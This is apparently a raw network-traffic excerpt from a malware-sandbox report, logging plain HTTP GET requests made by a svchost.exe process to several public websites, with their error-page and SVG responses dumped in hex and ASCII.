                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5083INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        28192.168.2.35058194.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5340OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5340INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5340INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        29192.168.2.35058794.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5356OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5527INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5527INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        3192.168.2.35040894.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC2INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:51 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC2INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        30192.168.2.35058675.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5528OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: ldh.la.gov
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5528INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 1346
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:04 UTC5528INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        31192.168.2.35093249.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:05 UTC5529OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:06 UTC5529INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:06 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 2599149
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                                        ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:06 UTC5530INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:06 UTC5545INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                                        Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:06 UTC5561INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                                                        Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:06 UTC5577INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                                                        Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:06 UTC5593INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5593INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                                                        Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5609INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5625INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                                        Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5641INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                                                        Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:07 UTC5657INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
